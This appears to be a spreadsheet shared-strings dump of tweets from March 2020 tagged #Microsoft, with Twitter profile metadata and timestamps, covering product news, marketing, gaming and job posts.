    <t>{'id': 828774937640841216, 'id_str': '828774937640841216', 'name': 'WA State &amp; Local', 'screen_name': 'CDWGWAGov', 'location': 'Bellevue, WA', 'description': "Working closely with WA State &amp; Local Gov't stakeholders, focusing on new technology solutions and initiatives, driving positive changes in their environment.", 'url': 'https://t.co/LZXT3JGo0m', 'entities': {'url': {'urls': [{'url': 'https://t.co/LZXT3JGo0m', 'expanded_url': 'http://www.cdwg.com', 'display_url': 'cdwg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7204, 'friends_count': 7425, 'listed_count': 124, 'created_at': 'Tue Feb 07 01:18:37 +0000 2017', 'favourites_count': 58355, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 83189, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/982851565475082241/sV75X7aU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/982851565475082241/sV75X7aU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/828774937640841216/1542481113',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</si>
  <si>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00:31:22 +0000 2020</t>
  </si>
  <si>
    <t>John Hoegger of Microsoft discusses how to better value diversity in the workforce.
https://t.co/jIiWG5QfbS
@Microsoft @SoniaTagare @theCUBE #WiDS2020 #theCUBE #Microsoft #EnterpriseTech #WomeninTech #diversity #datascience https://t.co/t6QtbRSlch</t>
  </si>
  <si>
    <t>Thu Mar 05 00:31:20 +0000 2020</t>
  </si>
  <si>
    <t>When was the last time disaster struck your IT infrastructure? If it hasn't happened yet, you're lucky. Safeguard against future mishaps and disaster with a comprehensive set of #Microsoft solutions tailored to secure your data. https://t.co/0BQUbhY7iR</t>
  </si>
  <si>
    <t>{'id': 125965018, 'id_str': '125965018', 'name': 'PrakashSoftware(MCP)', 'screen_name': 'PrakashSoftware', 'location': 'Worldwide', 'description': 'Build The Future You Imagine', 'url': 'http://t.co/JHvsAlMY4V', 'entities': {'url': {'urls': [{'url': 'http://t.co/JHvsAlMY4V', 'expanded_url': 'http://www.prakashinfotech.com', 'display_url': 'prakashinfotech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 942, 'friends_count': 745, 'listed_count': 31, 'created_at': 'Wed Mar 24 12:26:19 +0000 2010', 'favourites_count': 164, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1843,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'http://pbs.twimg.com/profile_images/1197858390178877440/LybSnCwt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197858390178877440/LybSnCwt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/125965018/1574495753',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</si>
  <si>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00:30:11 +0000 2020</t>
  </si>
  <si>
    <t>Cortana into Clippy?
5 reasons why Microsoft should rebrand 'Cortana' to 'Clippy'
https://t.co/qH2IAeNJGw
#microsoft #wednesdaywisdom #cortana #technology</t>
  </si>
  <si>
    <t>Thu Mar 05 00:26:27 +0000 2020</t>
  </si>
  <si>
    <t>PS5 vs XBOX SERIES X - WHO WILL WIN! https://t.co/JPS512GBPw via @YouTube #WednesdayThoughts #WednesdayVibes #WednesdayMotivation #WednesdayWisdom #WednesdayMood #TechVision2020 #PlayStation5 #xbox
#Sony #Microsoft #E32020 #BlackPanther #YouTubeGiveUsOurViews #YouTube https://t.co/YZsRERXoHI</t>
  </si>
  <si>
    <t>{'id': 120543323, 'id_str': '120543323', 'name': 'PetRockMedia', 'screen_name': 'petrockmediaSA', 'location': 'Texas, USA', 'description': 'Husband. Father. Gamer. Creator. YouTube &amp; Twitch - Petrockmedia', 'url': 'https://t.co/d1d7sjbFN1', 'entities': {'url': {'urls': [{'url': 'https://t.co/d1d7sjbFN1', 'expanded_url': 'https://www.youtube.com/petrockmedia', 'display_url': 'youtube.com/petrockmedia', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1659, 'friends_count': 2629, 'listed_count': 11, 'created_at': 'Sat Mar 06 19:28:26 +0000 2010', 'favourites_count': 3399, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5948,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'http://pbs.twimg.com/profile_images/1145482545724841986/2k1KSHoF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145482545724841986/2k1KSHoF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/120543323/1561938820', 'profile_link_color': '696969',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</si>
  <si>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Thu Mar 05 00:24:49 +0000 2020</t>
  </si>
  <si>
    <t>@Oracle is upping its game in the race against #Microsoft and #Amazon for #cloud computing market share. @Reuters #cdwsocial https://t.co/mFv1OW0BH5</t>
  </si>
  <si>
    <t>Thu Mar 05 00:21:36 +0000 2020</t>
  </si>
  <si>
    <t>Our employees have received the highest awards in industry and academia. Bring your innovative excellence as our teams Windows Systems Administator. https://t.co/9EjIUFs0EJ #Microsoft #Livermore, CA</t>
  </si>
  <si>
    <t>{'id': 1070428601072287745, 'id_str': '1070428601072287745', 'name': 'Livermore Lab Careers', 'screen_name': 'LLNLcareers', 'location': 'Livermore, CA', 'description': 'Join us @Livermore_Lab and make your mark on the world! #apply now to our #careers', 'url': 'https://t.co/sBOYba2aCR', 'entities': {'url': {'urls': [{'url': 'https://t.co/sBOYba2aCR', 'expanded_url': 'http://careers.llnl.gov', 'display_url': 'careers.llnl.gov', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1485, 'friends_count': 136, 'listed_count': 6, 'created_at': 'Wed Dec 05 21:24:00 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 396,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'http://pbs.twimg.com/profile_images/1070430814876254208/CgXvu-36_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1070430814876254208/CgXvu-36_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1070428601072287745/1578615486',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</si>
  <si>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00:18:08 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: NDv2-Series VMs are now Generally Available
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/SlpD5CyOmg</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: NVv4-Series VMs are now Generally Available
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/AbuHdkMgqJ</t>
  </si>
  <si>
    <t>Thu Mar 05 00:15:42 +0000 2020</t>
  </si>
  <si>
    <t>@MFA_China The origin of #COVID19 is not necessarily in China as #CoronaVirus which was Made in China can not last long.
#CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #XiJinping https://t.co/8EFUP8Mnou</t>
  </si>
  <si>
    <t>Thu Mar 05 00:14:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is making #Teams available free for six months to support public health and safety by making remote work even easier. Join our workshop on 20 March to to learn more about #MSTeams https://t.co/qrm0ALHYLE</t>
  </si>
  <si>
    <t>{'id': 19977049, 'id_str': '19977049', 'name': 'Marcus Dervin', 'screen_name': 'marcusdervin', 'location': 'Sydney', 'description': 'Digital Transformation consultant, author and speaker.', 'url': 'https://t.co/AUyKbUCfZ9', 'entities': {'url': {'urls': [{'url': 'https://t.co/AUyKbUCfZ9', 'expanded_url': 'http://www.injio.com', 'display_url': 'injio.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 637, 'friends_count': 939, 'listed_count': 32, 'created_at': 'Tue Feb 03 15:24:55 +0000 2009', 'favourites_count': 352, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1684,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'http://pbs.twimg.com/profile_images/884960163546845185/WQglEeq__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/884960163546845185/WQglEeq__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19977049/1560738477',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</si>
  <si>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00:13:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #EY And #ConsenSys To Make The Public #Ethereum #Blockchain Safe For Enterprises https://t.co/2lBwupCyKx</t>
  </si>
  <si>
    <t>{'id': 20222744, 'id_str': '20222744', 'name': 'Dinis Guarda', 'screen_name': 'dinisguarda', 'location': 'London / World', 'description': 'CEOFounderAuthor @ztudium @intelligenthq @blocksdna @fashionabc_ @HedgeThink @tradersdna @openbusinesshq @techabc_ #tech #blockchain #Fintech #AI @numerodna', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 40216, 'friends_count': 6615, 'listed_count': 4023, 'created_at': 'Fri Feb 06 08:12:16 +0000 2009', 'favourites_count': 31061, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 134295, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00BBFB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/731299791410503680/C5OSSIwu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/731299791410503680/C5OSSIwu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20222744/1555102638', 'profile_link_color': '1F98C7', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DAECF4', 'profile_text_color': '663B12', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 00:08:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft looks to give #Yammer a new lease of life; can it? https://t.co/gnIg1HJhtx</t>
  </si>
  <si>
    <t>{'id': 1207240100855173123, 'id_str': '1207240100855173123', 'name': 'PDF Streaming', 'screen_name': 'VideoInsidePDF', 'location': 'Las Vegas â€¢ New York â€¢ International', 'description': '#PDF #Streaming #HD #Video Inside your PDF Files, taking your #Video Presentations to that Next Level. A New Decade of Amazing. #AI #Edge https://t.co/Gw0vgibUfl', 'url': 'https://t.co/lEddiFDZt4', 'entities': {'url': {'urls': [{'url': 'https://t.co/lEddiFDZt4', 'expanded_url': 'https://pdfstreaming.com', 'display_url': 'pdfstreaming.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Gw0vgibUfl', 'expanded_url': 'http://bit.ly/2JIddwQ', 'display_url': 'bit.ly/2JIddwQ', 'indices': [138, 161]}]}}, 'protected': False, 'followers_count': 810, 'friends_count': 815, 'listed_count': 4, 'created_at': 'Wed Dec 18 10:04:25 +0000 2019', 'favourites_count': 221, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1207244016061800448/GhpiFm5d_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207244016061800448/GhpiFm5d_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1207240100855173123/1581578351', 'profile_link_color': 'FF0000',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</si>
  <si>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00:08:11 +0000 2020</t>
  </si>
  <si>
    <t>@ShannonJoyRadio Well, it was either #google, #apple or #Microsoft. It's was inevitable.
And if the #Cult45 #talkerCult has a say in this, we all better get on the #endoftimes train b/c #whataboutism.
H/T @glennbeck @SteveDeaceShow @Dronetek @charliekirk11</t>
  </si>
  <si>
    <t>{'id': 727962468413120512, 'id_str': '727962468413120512', 'name': 'Bill Bailey #NeverTrump #PatriotScum #NeverBernie', 'screen_name': 'BIASPUNDIT', 'location': 'California, USA', 'description': 'Husband, father, VET, xGOPer, neverDem, nonBinary, REAL Constitutional Originalist Conservative.\n\nFiscal conservative, social liberal is an oxy[moron]', 'url': 'https://t.co/kfvVtn3g1q', 'entities': {'url': {'urls': [{'url': 'https://t.co/kfvVtn3g1q', 'expanded_url': 'http://www.biaspundit.com', 'display_url': 'biaspundit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 131, 'friends_count': 6, 'listed_count': 1, 'created_at': 'Wed May 04 20:45:52 +0000 2016', 'favourites_count': 10261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12425,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'http://pbs.twimg.com/profile_images/1208364885282738176/OlgOv6Lz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208364885282738176/OlgOv6Lz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/727962468413120512/1576931578',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</si>
  <si>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00:05:57 +0000 2020</t>
  </si>
  <si>
    <t>@TheNewNorth is excited to announce the NEW Launch Alliance.
#NewNorthProud #wedc #doa #ttt #microsoft #packers https://t.co/phfHSxfQAG</t>
  </si>
  <si>
    <t>{'id': 23828400, 'id_str': '23828400', 'name': 'The New North', 'screen_name': 'TheNewNorth', 'location': 'Northeast Wisconsin', 'description': "New North, Inc. represents the 18 county region in Northeastern Wisconsin known as the New North region that is 'North of What You Expect.'", 'url': 'http://t.co/tEsGEzeZl2', 'entities': {'url': {'urls': [{'url': 'http://t.co/tEsGEzeZl2', 'expanded_url': 'http://www.thenewnorth.com/', 'display_url': 'thenewnorth.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4824, 'friends_count': 2113, 'listed_count': 150, 'created_at': 'Wed Mar 11 20:56:23 +0000 2009', 'favourites_count': 841, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6044, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0083C0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/616677357429092353/vKiLhDST_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/616677357429092353/vKiLhDST_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23828400/1580415697', 'profile_link_color': '0083C0', 'profile_sidebar_border_color': 'CFCFCF', 'profile_sidebar_fill_color': 'CFCFCF', 'profile_text_color': '4D4E53', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 00:05:12 +0000 2020</t>
  </si>
  <si>
    <t>Rated Top #Book to Read in 2020: Ultimate Guide to #Microsoft Certification
 #Azure
https://t.co/7U4gGMKIkF</t>
  </si>
  <si>
    <t>Thu Mar 05 00:00:53 +0000 2020</t>
  </si>
  <si>
    <t>If you're a #Microsoft #developer working on a #UWP application in @VisualStudio and make a mistake authoring the Package.appxmanifest file, have no fear!  We now provide a friendly error message to help you quickly figure out the issue. https://t.co/xlvZtKwXhq</t>
  </si>
  <si>
    <t>{'id': 1002668770681163776, 'id_str': '1002668770681163776', 'name': 'Edward Skrod', 'screen_name': 'EdwardSkrod', 'location': 'Jupiter, FL', 'description': '@Microsoft, #JiuJitsu, #DeadHead, #Surfing, #Software, #Philosophy, #Voluntaryism, #Economics, @WilkesHonorsFAU, @floridastate', 'url': 'https://t.co/2vChxNiTZa', 'entities': {'url': {'urls': [{'url': 'https://t.co/2vChxNiTZa', 'expanded_url': 'https://www.linkedin.com/in/edwardskrod', 'display_url': 'linkedin.com/in/edwardskrod', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 76, 'friends_count': 304, 'listed_count': 0, 'created_at': 'Fri Jun 01 21:50:38 +0000 2018', 'favourites_count': 1814, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 586, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1202281507836112902/D9MER6eE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202281507836112902/D9MER6eE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1002668770681163776/1527890663',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</si>
  <si>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00:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Cool! Did you know that you can get paid to use Bing as your search engine? Here's what you need to know about Microsoft Rewards (and how to earn 'em faster too). Check it out: https://t.co/gg2Tr6HfMQ #microsoft #bing https://t.co/N6SdqD1Yq7</t>
  </si>
  <si>
    <t>Wed Mar 04 23:55:44 +0000 2020</t>
  </si>
  <si>
    <t>Hello @killer_networks i dont know why i can't install the latest driver, it said that a problem is occured. Can you help me there, thank you very much for all and any suggestions . Waiting for help #ethernet #KillerNetworking #Help #SOS #Windows10 #Driver #Microsoft #Support https://t.co/JjpBZwYi3u</t>
  </si>
  <si>
    <t>{'id': 1209965387837825026, 'id_str': '1209965387837825026', 'name': 'Sensei Hawk', 'screen_name': 'SenseiHawk1', 'location': 'France', 'description': 'awesome french guy and gentleman. I love technology / Science , as well I am a fan of Starcrfat (I-II), Heroes then Overwatch (e-Sport...). Fan of LIVERPOOLâ™¥â™¥â™¥.', 'url': 'https://t.co/1IWrqjG7VK', 'entities': {'url': {'urls': [{'url': 'https://t.co/1IWrqjG7VK', 'expanded_url': 'https://www.twitch.tv/1draculemihawk', 'display_url': 'twitch.tv/1draculemihawk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 476, 'listed_count': 0, 'created_at': 'Wed Dec 25 22:33:40 +0000 2019', 'favourites_count': 1694, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 631, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1209967958107271168/EL2kfSqx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209967958107271168/EL2kfSqx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1209965387837825026/1579530899',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</si>
  <si>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23:54:48 +0000 2020</t>
  </si>
  <si>
    <t>Is Your Contact Center In the Zone? https://t.co/I2lq2SO5Lf
For more info: https://t.co/xkI5sxMYsw #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto https://t.co/6Le6DOwbEn</t>
  </si>
  <si>
    <t>Wed Mar 04 23:52:19 +0000 2020</t>
  </si>
  <si>
    <t>Take action on your ConfigMgr devices from the Microsoft Endpoint Manager admin center https://t.co/bm9Ot3Unsk #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 23:50:37 +0000 2020</t>
  </si>
  <si>
    <t>Apple - Why Windows 10 still sucks... https://t.co/XfJZOxTQtG via @JLAFORUMS #Windows10 #windows10sucks #microsoft #mickeysoft</t>
  </si>
  <si>
    <t>{'id': 50699029, 'id_str': '50699029', 'name': 'JLA FORUMS', 'screen_name': 'JLAFORUMS', 'location': 'USA', 'description': 'JLA FORUMS - Tweets by the JLA Admin, Development &amp; Writer Teams along with noteworthy posts &amp; things from the Watercooler.', 'url': 'https://t.co/J7Gdybg6mH', 'entities': {'url': {'urls': [{'url': 'https://t.co/J7Gdybg6mH', 'expanded_url': 'http://www.jlaforums.com', 'display_url': 'jlaforums.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 132, 'friends_count': 68, 'listed_count': 13, 'created_at': 'Thu Jun 25 16:54:29 +0000 2009', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15533, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E5E5E5', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/282079854/jla80_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/282079854/jla80_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50699029/1579391683', 'profile_link_color': '006699', 'profile_sidebar_border_color': '006699', 'profile_sidebar_fill_color': 'D1D7DC', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 23:50:00 +0000 2020</t>
  </si>
  <si>
    <t>What #BigTech wants with your #Medical #Data 
#Google, #Amazon, #Apple, #Microsoft &amp;amp; #Facebook are doubling down on #healthcare #DataScience
Strengthening #business ties with #health #industry by cash to store #patient #info or to create new #AI #tools
https://t.co/fTbN0g4NdZ</t>
  </si>
  <si>
    <t>{'id': 1158455774911160321, 'id_str': '1158455774911160321', 'name': 'Andrew Henreid', 'screen_name': 'AjHenreid', 'location': 'Los Angeles, CA', 'description': 'Associate Researcher @CedarsSinai ~ Dep. of Medicine, #HSRâ€”Emergency Medical Technician @CountyofLA : #Health #Data #Science #Psychology #EMS #Cognition #AI', 'url': 'https://t.co/TKj6fbh367', 'entities': {'url': {'urls': [{'url': 'https://t.co/TKj6fbh367', 'expanded_url': 'http://linkedin.com/in/andrew-henreid/', 'display_url': 'linkedin.com/in/andrew-henrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 114, 'friends_count': 461, 'listed_count': 2, 'created_at': 'Mon Aug 05 19:12:34 +0000 2019', 'favourites_count': 69, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1100, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234968405742014466/hCO0R388_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234968405742014466/hCO0R388_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1158455774911160321/1581103171',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</si>
  <si>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23:48:24 +0000 2020</t>
  </si>
  <si>
    <t>Going live with The Division 2!!!! https://t.co/NityMexBI0 - kodgaming90
#XboxOne #division2 #twitchstreamer #twitch #supportsmallstreamers  #gamingislife #twitchaffiliate #ubisoft #microsoft https://t.co/DQAFpmVoJL</t>
  </si>
  <si>
    <t>Wed Mar 04 23:47:22 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is handing out special E1 #Office365 Trial licensenses (valid for 6 months) in response to the increased need for employees to work from home due to the COVID-19 (coronavirus) Find out more here: https://t.co/ROTTzZPXCG #MSFT</t>
  </si>
  <si>
    <t>{'id': 784807410225582080, 'id_str': '784807410225582080', 'name': 'Dian Taylor ðŸ‡³ðŸ‡±ðŸ¤˜MVP', 'screen_name': 'D365Goddess', 'location': 'Boca Raton, FL', 'description': 'Microsoft Business Applications MVP | D365 CE Presales Consultant at RSM | Speaker | Blogger | Addicted to #MSDyn365CE | Native Dutchie living in the US', 'url': 'https://t.co/gR1fK0qfcM', 'entities': {'url': {'urls': [{'url': 'https://t.co/gR1fK0qfcM', 'expanded_url': 'https://d365goddess.com', 'display_url': 'd365goddess.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 389, 'friends_count': 245, 'listed_count': 8, 'created_at': 'Sat Oct 08 17:27:22 +0000 2016', 'favourites_count': 1457, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 435, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1099502499097120774/bvOKgVe5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1099502499097120774/bvOKgVe5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/784807410225582080/1550699442',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</si>
  <si>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23:45:59 +0000 2020</t>
  </si>
  <si>
    <t>Indivisible (08) | https://t.co/zf8IRzW3oK Plays | 03-01-2020 https://t.co/2D8EHIFdxd #Indivisible #IndivisibleRPG #LabZero #Microsoft #XBoxOne #XboxShare [ FT. @RicDaraMan, @Dilligaf_inc, @TheLavenderMyst  ]</t>
  </si>
  <si>
    <t>{'id': 2883056662, 'id_str': '2883056662', 'name': 'TalkBrunch', 'screen_name': 'TalkBrunch', 'location': '', 'description': 'Pop Culture, Wrestling, Gaming, Comics, Anime, Satire &amp; Comedy, Served Hot!  Hosted by: @RicDaraMan', 'url': 'http://t.co/8pFvIVG1tQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/8pFvIVG1tQ', 'expanded_url': 'http://TalkBrunch.com', 'display_url': 'TalkBrunch.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 501, 'friends_count': 367, 'listed_count': 11, 'created_at': 'Tue Nov 18 19:36:04 +0000 2014', 'favourites_count': 262, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6257,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'http://pbs.twimg.com/profile_images/793827942539354112/17mCbnit_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793827942539354112/17mCbnit_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2883056662/1478098366', 'profile_link_color': 'FF0000',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</si>
  <si>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23:45:42 +0000 2020</t>
  </si>
  <si>
    <t>How to get a good deal on Microsoft Project for Windows: https://t.co/7bNmsW0LeR
#Microsoft #Software #MicrosoftProject https://t.co/lJT56Vgqig</t>
  </si>
  <si>
    <t>{'id': 1234751930032746496, 'id_str': '1234751930032746496', 'name': 'Insight Software', 'screen_name': 'InsightsoftAU', 'location': 'Australia', 'description': 'Offering great deals on Microsoft, Avast, AVG productivity &amp; anti-virus software.', 'url': 'https://t.co/tNVa9DuP1z', 'entities': {'url': {'urls': [{'url': 'https://t.co/tNVa9DuP1z', 'expanded_url': 'https://www.insightsoftware.net.au', 'display_url': 'insightsoftware.net.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Tue Mar 03 08:06:25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'http://pbs.twimg.com/profile_images/1234752195502886912/3iozfW8g_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234752195502886912/3iozfW8g_normal.jpg',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</si>
  <si>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23:44:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Releases PowerShell 7.0 With New Features, Update Alerts
https://t.co/u1rHcdZnSB https://t.co/5OZ8TJJf7W</t>
  </si>
  <si>
    <t>Wed Mar 04 23:42:59 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft teases new Windows 10 Start menu that de-emphasizes Live Tiles https://t.co/hWPdiGOaBE #microsoft</t>
  </si>
  <si>
    <t>{'id': 42970220, 'id_str': '42970220', 'name': 'Jonathan D. Brown', 'screen_name': 'jdbnet', 'location': 'Los Angeles, CA, USA', 'description': 'See my web site: http://t.co/lFCYQqWUxv', 'url': 'http://t.co/lFCYQqWUxv', 'entities': {'url': {'urls': [{'url': 'http://t.co/lFCYQqWUxv', 'expanded_url': 'http://www.jdb.net/Jonathan-D--Brown.php', 'display_url': 'jdb.net/Jonathan-D--Brâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/lFCYQqWUxv', 'expanded_url': 'http://www.jdb.net/Jonathan-D--Brown.php', 'display_url': 'jdb.net/Jonathan-D--Brâ€¦', 'indices': [17, 39]}]}}, 'protected': False, 'followers_count': 71, 'friends_count': 79, 'listed_count': 8, 'created_at': 'Wed May 27 21:20:19 +0000 2009', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5230,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'http://pbs.twimg.com/profile_images/665712765491785728/AyH94d3o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/665712765491785728/AyH94d3o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/42970220/1380893746',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</si>
  <si>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23:42:04 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft 
Maybe do #microsoftTAG with art built in
#microsoft https://t.co/xWow1Vcfpv</t>
  </si>
  <si>
